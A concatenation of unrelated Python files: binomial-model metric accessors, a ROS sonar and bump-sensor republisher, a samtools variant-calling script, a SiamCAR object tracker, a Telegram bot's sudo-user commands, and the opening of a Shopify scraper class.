:param train: If train is True, then return the tnr value for the training data.
:param valid: If valid is True, then return the tnr value for the validation data.
:param xval: If xval is True, then return the tnr value for the cross validation data.
:return: The F1 for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("tnr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def fnr(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the False Negative Rates for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the fnr value for the training data.
:param valid: If valid is True, then return the fnr value for the validation data.
:param xval: If xval is True, then return the fnr value for the cross validation data.
:return: The fnr for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("fnr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def fpr(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the False Positive Rates for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the fpr value for the training data.
:param valid: If valid is True, then return the fpr value for the validation data.
:param xval: If xval is True, then return the fpr value for the cross validation data.
:return: The fpr for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("fpr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def recall(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the Recall (AKA True Positive Rate) for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the recall value for the training data.
:param valid: If valid is True, then return the recall value for the validation data.
:param xval: If xval is True, then return the recall value for the cross validation data.
:return: The recall for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("tpr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def sensitivity(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the sensitivity (AKA True Positive Rate or Recall) for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the sensitivity value for the training data.
:param valid: If valid is True, then return the sensitivity value for the validation data.
:param xval: If xval is True, then return the sensitivity value for the cross validation data.
:return: The sensitivity for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("tpr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def fallout(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the Fallout (AKA False Positive Rate) for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the fallout value for the training data.
:param valid: If valid is True, then return the fallout value for the validation data.
:param xval: If xval is True, then return the fallout value for the cross validation data.
:return: The fallout for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("fpr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def missrate(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the miss rate (AKA False Negative Rate) for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the missrate value for the training data.
:param valid: If valid is True, then return the missrate value for the validation data.
:param xval: If xval is True, then return the missrate value for the cross validation data.
:return: The missrate for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("fnr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def specificity(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the specificity (AKA True Negative Rate) for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the specificity value for the training data.
:param valid: If valid is True, then return the specificity value for the validation data.
:param xval: If xval is True, then return the specificity value for the cross validation data.
:return: The specificity for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("tnr", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def mcc(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the mcc for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the mcc value for the training data.
:param valid: If valid is True, then return the mcc value for the validation data.
:param xval: If xval is True, then return the mcc value for the cross validation data.
:return: The mcc for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("absolute_MCC", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def max_per_class_error(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the max per class error for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the max_per_class_error value for the training data.
:param valid: If valid is True, then return the max_per_class_error value for the validation data.
:param xval: If xval is True, then return the max_per_class_error value for the cross validation data.
:return: The max_per_class_error for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else [[mpca[0],1-mpca[1]] for mpca in v.metric("min_per_class_accuracy", thresholds=thresholds)]
return m.values()[0] if len(m) == 1 else m
def metric(self, metric, thresholds=None, train=False, valid=False, xval=False):
"""
Get the metric value for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param train: If train is True, then return the metrics for the training data.
:param valid: If valid is True, then return the metrics for the validation data.
:param xval: If xval is True, then return the metrics for the cross validation data.
:return: The metrics for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric(metric,thresholds)
return m.values()[0] if len(m) == 1 else m
def plot(self, type="roc", train=False, valid=False, xval=False, **kwargs):
"""
Produce the desired metric plot
If all are False (default), then return the training metric value.
:param type: the type of metric plot (currently, only ROC supported)
:param train: If train is True, then plot for training data.
:param valid: If valid is True, then plot for validation data.
:param xval: If xval is True, then plot for cross validation data.
:param show: if False, the plot is not shown. matplotlib show method is blocking.
:return: None
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
for k,v in zip(tm.keys(),tm.values()):
if v is not None: v.plot(type=type, **kwargs)
def confusion_matrix(self, metrics=None, thresholds=None, train=False, valid=False, xval=False):
"""
Get the confusion matrix for the specified metrics/thresholds
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param metrics: A string (or list of strings) in {"min_per_class_accuracy", "absolute_MCC", "tnr", "fnr", "fpr", "tpr", "precision", "accuracy", "f0point5", "f2", "f1"}
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the confusion matrix value for the training data.
:param valid: If valid is True, then return the confusion matrix value for the validation data.
:param xval: If xval is True, then return the confusion matrix value for the cross validation data.
:return: The confusion matrix for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.confusion_matrix(metrics=metrics, thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def find_threshold_by_max_metric(self,metric,train=False, valid=False, xval=False):
"""
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param train: If train is True, then return the threshold_by_max_metric value for the training data.
:param valid: If valid is True, then return the threshold_by_max_metric value for the validation data.
:param xval: If xval is True, then return the threshold_by_max_metric value for the cross validation data.
:return: The threshold_by_max_metric for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.find_threshold_by_max_metric(metric)
return m.values()[0] if len(m) == 1 else m
def find_idx_by_threshold(self,threshold,train=False, valid=False, xval=False):
"""
Retrieve the index in this metric's threshold list at which the given threshold is located.
If all are False (default), then return the training metric value.
If more than one options is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param train: If train is True, then return the idx_by_threshold for the training data.
:param valid: If valid is True, then return the idx_by_threshold for the validation data.
:param xval: If xval is True, then return the idx_by_threshold for the cross validation data.
:return: The idx_by_threshold for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.find_idx_by_threshold(threshold)
return m.values()[0] if len(m) == 1 else m
|
#!/usr/bin/env python
'''
Republishes ultrasonic sensors data from Arduino to normal Range messages
Rebublished bump sensors data from Arduino to fixed distance ranger Range message
_____9___0_____
| 8 1 |
|7 2|
| SONAR |
|6 3|
\ /
\5 4/
\_________/
___13_14__00_01___
|12 02|
|11 03|
| BUMP |
|10 04|
| |
|09 05|
\ /
\08 06/
\_____07_____/
'''
import rospy
from sensor_msgs.msg import Range
from samana_msgs.msg import Int16Array, Bump, ImuCalib
from std_msgs.msg import Bool
import math
def enable_front_sensors_cb(msg):
global enable_front_sensors
enable_front_sensors = msg.data
rospy.loginfo("enable_front_sensors: {}".format(enable_front_sensors))
SONAR_COUNT = 10
sonar_hist = [[] for _ in range(SONAR_COUNT)] # [[],] * SONAR_COUNT BUGFIX
temp_correction_coef = 1.0 # Updated in imu_calib_callback()
enable_front_sensors = True # If false shortens front sonars range and disables from bump sensors
range_sonar_msg = Range()
range_bump_msg = Range()
# 0 1 2 3 4 | 5 6 7 8 9
# sonar_max_ranges = [0.2, 0.5, 0.55, 0.7, 0.5, 0.5, 0.7, 0.55, 0.5, 0.2] # NOTE: tuning filter. Found experimentally
sonar_max_ranges = [0.07, 0.4, 0.45, 0.55, 0.4, 0.4, 0.55, 0.45, 0.4, 0.07] # NOTE: tuning filter. Found experimentally
sonar_max_ranges_disabled = [0.03, 0.06, -1, -1, -1, -1, -1, -1, 0.06, 0.03] # NOTE: tuning filter. Found experimentally
# sonar_max_ranges = [0.4] + [0.5] * 8 + [0.4] # NOTE: tuning filter. Found experimentally
# Publishers
sonar_pub = rospy.Publisher("range_sonar", Range, queue_size=10)
# sonar_pub_all = rospy.Publisher("range_sonar_all", Range, queue_size=5) # NOTE: debug
bump_pub1 = rospy.Publisher("range_bump1", Range, queue_size=10)
bump_pub2 = rospy.Publisher("range_bump2", Range, queue_size=10)
# Subscribers
rospy.Subscriber("params/enable_front_sensors", Bool, enable_front_sensors_cb)
# ------------------------------- FUNCTIONS -------------------------------
def sonar_callback(range_data):
"""
Republishes filtered received distances array to Range messages
"""
time_now = rospy.Time.now() - rospy.Time(0.04) # 1 / 24Hz
for i in range(SONAR_COUNT):
# Setup message info
range_sonar_msg.header.frame_id = "ultrasonic_%d" % (i + 1)
range_sonar_msg.header.stamp = range_data.header.stamp
range_sonar_msg.max_range = sonar_max_ranges[i] # Set each max range different
# Shorten front sensors range if published to do so
if enable_front_sensors is False and sonar_max_ranges_disabled[i] != -1:
range_sonar_msg.max_range = sonar_max_ranges_disabled[i]
dist = range_data.data[i] / 1000.0 * temp_correction_coef # Distance in meters corrected for temperature
range_sonar_msg.range = dist
# Outlier filter: values in history must be similar to the last one
outlier = is_outlier(dist, i)
if outlier is False:
sonar_pub.publish(range_sonar_msg)
# NOTE: Debug all sonar ranges
# range_sonar_msg.max_range = 10.0
# sonar_pub_all.publish(range_sonar_msg)
def is_outlier(reading, i=0):
"""
Outliers filter for sonars. Considers max speed and recency of readings
:param reading: new distance reading
:param i: index of sonar
:return: True if reading is outlier and should be discarded
Readings come at 24Hz or 41.7ms
"""
# NOTE: tuning range filter parameters
HIST_COUNT = 6 # 6*41.7 = 250.2ms | 7*41.7 = 291.9ms
MAX_OUTLIERS = int(HIST_COUNT // 3) # For every 3 readings 1 outlier is allowed
MAX_DELTA_PER_READING = 0.0292 # 0.5m/s / 24Hz = 0.021m | 0.7m/s - 0.0292cm | 0.03 * 7 = 0.21
NOISE_LEVEL = 0.0275 # Found by graphing sonar data
# Store history of readings
sonar_hist[i].append(reading)
if len(sonar_hist[i]) > HIST_COUNT:
sonar_hist[i].pop(0)
# Find if it's outlier
outlier = False
outliers = 0
for j, dist in enumerate(sonar_hist[i]):
range_thresh = NOISE_LEVEL + MAX_DELTA_PER_READING * j
if abs(reading - dist) > range_thresh:
outliers += 1
if outliers > MAX_OUTLIERS:
outlier = True
break
return outlier
def imu_calib_callback(data):
"""
For calculating correction factor for sonar sensor for different temperature
NOTE: data from Arduino assumes 20degC
"""
global temp_correction_coef
JUNCTION_TEMP = 6 # Because it measures internal chip temp. With no air flow it's 8degC and ~5degC with airflow
ASSUMED_SPEED_OF_SOUND = 343.42 # speed_of_sound = 331.3 + 0.606 * 20degC
corrected_speed_of_sound = 331.3 + 0.606 * (data.temp - JUNCTION_TEMP)
temp_correction_coef = corrected_speed_of_sound / ASSUMED_SPEED_OF_SOUND
def bump_callback(bump_data):
"""
Republishes received bitmask to Range messages of fixed distance ranger
"""
global range_bump_msg
BUMP_SENSORS_COUNT = 15
# Static variable equivalent bin_data_old
try:
bump_callback.bin_data_old # Checks if variable exists
bump_callback.bin_prev_posted # Checks if variable exists
bump_callback.last_bump_t # Checks if variable exists
except AttributeError:
bump_callback.bin_data_old = '0' * BUMP_SENSORS_COUNT
bump_callback.bin_prev_posted = [0, ] * BUMP_SENSORS_COUNT
bump_callback.last_bump_t = [rospy.Time.now(), ] * BUMP_SENSORS_COUNT
# print("DEFINED")
# Converting int16 to string of len 15
bin_data = '{data:0{width}b}'.format(data=bump_data.bump_bits, width=BUMP_SENSORS_COUNT)[::-1]
# print(bin_data)
for i in range(BUMP_SENSORS_COUNT):
# Simple filter. Consider trigger if triggered for 2 frame in a row
r = float("inf") # +inf - no detection
if bin_data[i] == '1' and bump_callback.bin_data_old[i] == '1':
r = float("-inf") # -inf - detection bumped
if enable_front_sensors is False and i in [0, 1, 13, 14]:
r = float("inf") # Effectivelly disables 4 front bump sensors
# If not the same range as previous or forced update
if bump_callback.bin_prev_posted[i] != r or rospy.Time.now() - bump_callback.last_bump_t[i] > rospy.Duration(0.4):
bump_callback.last_bump_t[i] = rospy.Time.now()
# Publish bump as fixed Range
range_bump_msg.header.frame_id = "bump_%d" % (i + 1)
range_bump_msg.header.stamp = bump_data.header.stamp
range_bump_msg.range = r
# There's limit of 10 Range messages to display
# https://answers.ros.org/question/11701/rviz-message-filter-queue-size/
if i <= 7:
bump_pub1.publish(range_bump_msg)
bump_callback.bin_prev_posted[i] = range_bump_msg.range
else:
bump_pub2.publish(range_bump_msg)
bump_callback.bin_prev_posted[i] = range_bump_msg.range
# Remember previous bin_data
bump_callback.bin_data_old = bin_data
# ------------------------------- MAIN -------------------------------
if __name__ == "__main__":
rospy.init_node("range_pub")
# Setup static sonar range message data
range_sonar_msg.radiation_type = range_sonar_msg.ULTRASOUND
range_sonar_msg.field_of_view = math.radians(15)
range_sonar_msg.min_range = 0.02
# NOTE: Important if max_range will be set larger than real max range
# Map builder will pickup unexisting obstacles at the end of sonar cone
# It is set for each sensor differently in callback function
# range_sonar_msg.max_range = 7.0
# Setup static bump range message data
range_bump_msg.radiation_type = range_bump_msg.INFRARED
range_bump_msg.field_of_view = math.radians(45) # It's because bump sensor can bend
range_bump_msg.min_range = 0.05
range_bump_msg.max_range = range_bump_msg.min_range # Because fixed distance
# Subscribe to topics
rospy.Subscriber("sonar", Int16Array, sonar_callback)
rospy.Subscriber("bump", Bump, bump_callback)
rospy.Subscriber("imu_calib", ImuCalib, imu_calib_callback)
# Don't exit
rospy.spin()
|
#!/usr/bin/env python
__author__ = 'Sergei F. Kliver'
import argparse
from RouToolPa.Tools.Samtools import VariantCall
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--bam_list", action="store", dest="bam_list", type=lambda s: s.split(","), required=True,
help="Comma-separated list of bam files")
parser.add_argument("-r", "--reference", action="store", dest="reference", required=True,
help="Fasta file with reference")
parser.add_argument("-o", "--output_prefix", action="store", dest="output_prefix", required=True,
help="Prefix of output files")
parser.add_argument("-t", "--threads", action="store", dest="threads", default=1, type=int,
help="Number of threads to use. Default: 1 ")
parser.add_argument("-k", "--chunk_length", action="store", dest="chunk_length", default=1000000, type=int,
help="Chunk length. Default: 1 000 000 bp")
parser.add_argument("-d", "--max_per_sample_coverage", action="store", dest="max_per_sample_coverage", type=int,
help="Maximum per sample coverage to use")
parser.add_argument("-q", "--min_base_quality", action="store", dest="min_base_quality", default=30, type=int,
help="Minimum base quality. Default: 30")
parser.add_argument("-m", "--min_mapping_quality", action="store", dest="min_mapping_quality", default=30, type=int,
help="Minimum mapping quality. Default: 30 ")
parser.add_argument("-a", "--mapping_quality_penalty", action="store", dest="mapping_quality_penalty",
type=int,
help="Penalty for mapping quality of reads having long mismatches. "
"Use 50 for BWA. Default: not set")
parser.add_argument("-c", "--consensus_caller_model", action="store_true", dest="consensus_caller_model",
help="Use consensus caller model(old one implemented in samtools). Default: false")
parser.add_argument("-e", "--report_all_positions", action="store_true", dest="report_all_positions", default=False,
help="Report all positions in resulting vcf file. Default: false")
args = parser.parse_args()
VariantCall.threads = args.threads
VariantCall.call_variants(args.reference, args.output_prefix, args.bam_list,
chunk_length=args.chunk_length,
split_dir="split/", max_coverage=args.max_per_sample_coverage,
min_base_quality=args.min_base_quality,
min_mapping_quality=args.min_mapping_quality,
adjust_mapping_quality=args.mapping_quality_penalty,
consensus_caller_model=args.consensus_caller_model,
report_all_positions=args.report_all_positions)
|
# Copyright (c) SenseTime. All Rights Reserved.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import torch.nn.functional as F
import cv2
from pysot.utils.bbox import corner2center
from pysot.core.config import cfg
from pysot.tracker.base_tracker import SiameseTracker
from pysot.utils.misc import bbox_clip
import matplotlib.pyplot as plt
class SiamCARTracker(SiameseTracker):
def __init__(self, model, cfg):
super(SiamCARTracker, self).__init__()
hanning = np.hanning(cfg.SCORE_SIZE)
self.window = np.outer(hanning, hanning)
self.model = model
self.model.eval()
def generate_points(stride, size):
ori = - (size // 2) * stride
x, y = np.meshgrid([ori + stride * dx for dx in np.arange(0, size)],
[ori + stride * dy for dy in np.arange(0, size)])
points = np.zeros((size * size, 2), dtype=np.float32)
points[:, 0], points[:, 1] = x.astype(np.float32).flatten(), y.astype(np.float32).flatten()
return points
self.points = generate_points(cfg.STRIDE, cfg.SCORE_SIZE)
def _convert_cls(self, cls):
cls = F.softmax(cls[:,:,:,:], dim=1).data[:,1,:,:].cpu().numpy()
return cls
def init(self, img, bbox):
"""
args:
img(np.ndarray): BGR image
bbox: (x, y, w, h) bbox
"""
self.center_pos = np.array([bbox[0]+(bbox[2]-1)/2,
bbox[1]+(bbox[3]-1)/2])
self.size = np.array([bbox[2], bbox[3]])
# calculate z crop size
w_z = self.size[0] + cfg.TRACK.CONTEXT_AMOUNT * np.sum(self.size)
h_z = self.size[1] + cfg.TRACK.CONTEXT_AMOUNT * np.sum(self.size)
s_z = round(np.sqrt(w_z * h_z))
# calculate channle average
self.channel_average = np.mean(img, axis=(0, 1))
# get crop
z_crop = self.get_subwindow(img, self.center_pos,
cfg.TRACK.EXEMPLAR_SIZE,
s_z, self.channel_average)
self.model.template(z_crop)
def change(self,r):
return np.maximum(r, 1. / r)
def sz(self, w, h):
pad = (w + h) * 0.5
return np.sqrt((w + pad) * (h + pad))
def cal_penalty(self, lrtbs, penalty_lk):
bboxes_w = lrtbs[0, :, :] + lrtbs[2, :, :]
bboxes_h = lrtbs[1, :, :] + lrtbs[3, :, :]
s_c = self.change(self.sz(bboxes_w, bboxes_h) / self.sz(self.size[0]*self.scale_z, self.size[1]*self.scale_z))
r_c = self.change((self.size[0] / self.size[1]) / (bboxes_w / bboxes_h))
penalty = np.exp(-(r_c * s_c - 1) * penalty_lk)
return penalty
def accurate_location(self, max_r_up, max_c_up):
dist = int((cfg.TRACK.INSTANCE_SIZE - (cfg.TRACK.SCORE_SIZE - 1) * 8) / 2)
max_r_up += dist
max_c_up += dist
p_cool_s = np.array([max_r_up, max_c_up])
disp = p_cool_s - (np.array([cfg.TRACK.INSTANCE_SIZE, cfg.TRACK.INSTANCE_SIZE]) - 1.) / 2.
return disp
def coarse_location(self, hp_score_up, p_score_up, scale_score, lrtbs):
upsize = (cfg.TRACK.SCORE_SIZE - 1) * cfg.TRACK.STRIDE + 1
max_r_up_hp, max_c_up_hp = np.unravel_index(hp_score_up.argmax(), hp_score_up.shape)
max_r = int(round(max_r_up_hp / scale_score))
max_c = int(round(max_c_up_hp / scale_score))
max_r = bbox_clip(max_r, 0, cfg.TRACK.SCORE_SIZE-1)
max_c = bbox_clip(max_c, 0, cfg.TRACK.SCORE_SIZE-1)
bbox_region = lrtbs[max_r, max_c, :]
min_bbox = int(cfg.TRACK.REGION_S * cfg.TRACK.EXEMPLAR_SIZE)
max_bbox = int(cfg.TRACK.REGION_L * cfg.TRACK.EXEMPLAR_SIZE)
l_region = int(min(max_c_up_hp, bbox_clip(bbox_region[0], min_bbox, max_bbox)) / 2.0)
t_region = int(min(max_r_up_hp, bbox_clip(bbox_region[1], min_bbox, max_bbox)) / 2.0)
r_region = int(min(upsize - max_c_up_hp, bbox_clip(bbox_region[2], min_bbox, max_bbox)) / 2.0)
b_region = int(min(upsize - max_r_up_hp, bbox_clip(bbox_region[3], min_bbox, max_bbox)) / 2.0)
mask = np.zeros_like(p_score_up)
mask[max_r_up_hp - t_region:max_r_up_hp + b_region + 1, max_c_up_hp - l_region:max_c_up_hp + r_region + 1] = 1
p_score_up = p_score_up * mask
return p_score_up
def getCenter(self,hp_score_up, p_score_up, scale_score,lrtbs):
# corse location
score_up = self.coarse_location(hp_score_up, p_score_up, scale_score, lrtbs)
# accurate location
max_r_up, max_c_up = np.unravel_index(score_up.argmax(), score_up.shape)
disp = self.accurate_location(max_r_up,max_c_up)
disp_ori = disp / self.scale_z
new_cx = disp_ori[1] + self.center_pos[0]
new_cy = disp_ori[0] + self.center_pos[1]
return max_r_up, max_c_up, new_cx, new_cy
def track_cam(self, img, hp):
"""
args:
img(np.ndarray): BGR image
return:
bbox(list):[x, y, width, height]
"""
w_z = self.size[0] + cfg.TRACK.CONTEXT_AMOUNT * np.sum(self.size)
h_z = self.size[1] + cfg.TRACK.CONTEXT_AMOUNT * np.sum(self.size)
s_z = np.sqrt(w_z * h_z)
self.scale_z = cfg.TRACK.EXEMPLAR_SIZE / s_z
s_x = s_z * (cfg.TRACK.INSTANCE_SIZE / cfg.TRACK.EXEMPLAR_SIZE)
x_crop = self.get_subwindow(img, self.center_pos,
cfg.TRACK.INSTANCE_SIZE,
round(s_x), self.channel_average)
outputs = self.model.track(x_crop)
cls = outputs['cls']
cls_tensor = cls[:, 1, :, :]
cls = cls.data[:, 1, :, :].cpu().numpy().squeeze()
cen = outputs['cen'].data.cpu().numpy()
cen = (cen - cen.min()) / cen.ptp()
cen = cen.squeeze()
lrtbs = outputs['loc'].data.cpu().numpy().squeeze()
# plt.figure(figsize=(25, 25))
# plt.imshow(cls,cmap='viridis') # plasma
# plt.show()
upsize = (cfg.TRACK.SCORE_SIZE - 1) * cfg.TRACK.STRIDE + 1
penalty = self.cal_penalty(lrtbs, hp['penalty_k'])
p_score = penalty * cls * cen
if cfg.TRACK.hanming:
hp_score = p_score * (1 - hp['window_lr']) + self.window * hp['window_lr']
else:
hp_score = p_score
hp_score_up = cv2.resize(hp_score, (upsize, upsize), interpolation=cv2.INTER_CUBIC)
p_score_up = cv2.resize(p_score, (upsize, upsize), interpolation=cv2.INTER_CUBIC)
cls_up = cv2.resize(cls, (upsize, upsize), interpolation=cv2.INTER_CUBIC)
lrtbs = np.transpose(lrtbs, (1, 2, 0))
lrtbs_up = cv2.resize(lrtbs, (upsize, upsize), interpolation=cv2.INTER_CUBIC)
scale_score = upsize / cfg.TRACK.SCORE_SIZE
# get center
max_r_up, max_c_up, new_cx, new_cy = self.getCenter(hp_score_up, p_score_up, scale_score, lrtbs)
# get w h
ave_w = (lrtbs_up[max_r_up, max_c_up, 0] + lrtbs_up[max_r_up, max_c_up, 2]) / self.scale_z
ave_h = (lrtbs_up[max_r_up, max_c_up, 1] + lrtbs_up[max_r_up, max_c_up, 3]) / self.scale_z
s_c = self.change(self.sz(ave_w, ave_h) / self.sz(self.size[0] * self.scale_z, self.size[1] * self.scale_z))
r_c = self.change((self.size[0] / self.size[1]) / (ave_w / ave_h))
penalty = np.exp(-(r_c * s_c - 1) * hp['penalty_k'])
lr = penalty * cls_up[max_r_up, max_c_up] * hp['lr']
new_width = lr * ave_w + (1 - lr) * self.size[0]
new_height = lr * ave_h + (1 - lr) * self.size[1]
# clip boundary
cx = bbox_clip(new_cx, 0, img.shape[1])
cy = bbox_clip(new_cy, 0, img.shape[0])
width = bbox_clip(new_width, 0, img.shape[1])
height = bbox_clip(new_height, 0, img.shape[0])
# udpate state
self.center_pos = np.array([cx, cy])
self.size = np.array([width, height])
bbox = [cx - width / 2,
cy - height / 2,
width,
height]
return {
'bbox': bbox,
"x_crop": x_crop,
'cls': cls_tensor
} |
from Music import app, OWNER
import os
import subprocess
import shutil
import re
import sys
import traceback
from Music.MusicUtilities.database.sudo import (get_sudoers, get_sudoers, remove_sudo, add_sudo)
from pyrogram import filters, Client
from pyrogram.types import Message
@app.on_message(filters.command("addmsudo") & filters.user(OWNER))
async def useradd(_, message: Message):
if not message.reply_to_message:
if len(message.command) != 2:
await message.reply_text("❌ Reply to a user's message or give username/user_id.")
return
user = message.text.split(None, 1)[1]
if "@" in user:
user = user.replace("@", "")
user = (await app.get_users(user))
from_user = message.from_user
sudoers = await get_sudoers()
if user.id in sudoers:
return await message.reply_text("✅ Aleady a Sudo User.")
added = await add_sudo(user.id)
if added:
await message.reply_text(f"✅ Added **{user.mention}** as a Super User for Yukki OwO")
return os.execvp("python3", ["python3", "-m", "Music"])
await edit_or_reply(message, text="❌ Something wrong happened, checkslogs.")
return
from_user_id = message.from_user.id
user_id = message.reply_to_message.from_user.id
mention = message.reply_to_message.from_user.mention
sudoers = await get_sudoers()
if user_id in sudoers:
return await message.reply_text("✅ Already a Sudo User.")
added = await add_sudo(user_id)
if added:
await message.reply_text(f"✅ Added **{mention}** as a Super User for Yukki OwO")
return os.execvp("python3", ["python3", "-m", "Music"])
await edit_or_reply(message, text="❌ Something wrong happened, check logs.")
return
@app.on_message(filters.command("delmsudo") & filters.user(OWNER))
async def userdel(_, message: Message):
if not message.reply_to_message:
if len(message.command) != 2:
await message.reply_text("❌ Reply to a user's message or give username/user_id.")
return
user = message.text.split(None, 1)[1]
if "@" in user:
user = user.replace("@", "")
user = (await app.get_users(user))
from_user = message.from_user
if user.id not in await get_sudoers():
return await message.reply_text(f"❌ Not a part of Yukki's Sudo.")
removed = await remove_sudo(user.id)
if removed:
await message.reply_text(f"✅ Removed **{user.mention}** from Yukki's Sudo.")
return os.execvp("python3", ["python3", "-m", "Music"])
await message.reply_text(f"❌ Something wrong happened.")
return
from_user_id = message.from_user.id
user_id = message.reply_to_message.from_user.id
mention = message.reply_to_message.from_user.mention
if user_id not in await get_sudoers():
return await message.reply_text(f"❌ Not a part of Yukki's Sudo.")
removed = await remove_sudo(user_id)
if removed:
await message.reply_text(f"✅ Removed **{mention}** from Yukki's Sudo.")
return os.execvp("python3", ["python3", "-m", "Music"])
await message.reply_text(f"❌ Something wrong happened.")
@app.on_message(filters.command("sudolist"))
async def sudoers_list(_, message: Message):
sudoers = await get_sudoers()
text = "**__Sudo Users List of Yui Music:-__**\n\n"
for count, user_id in enumerate(sudoers, 1):
try:
user = await app.get_users(user_id)
user = user.first_name if not user.mention else user.mention
except Exception:
continue
text += f"➤ {user}\n"
if not text:
await message.reply_text("❌ No Sudo Users")
else:
await message.reply_text(text)
|
import requests
import json
# import dataset4
class ShopifyScraper():
def __init__(self,baseurl):
self.baseurl = baseurl
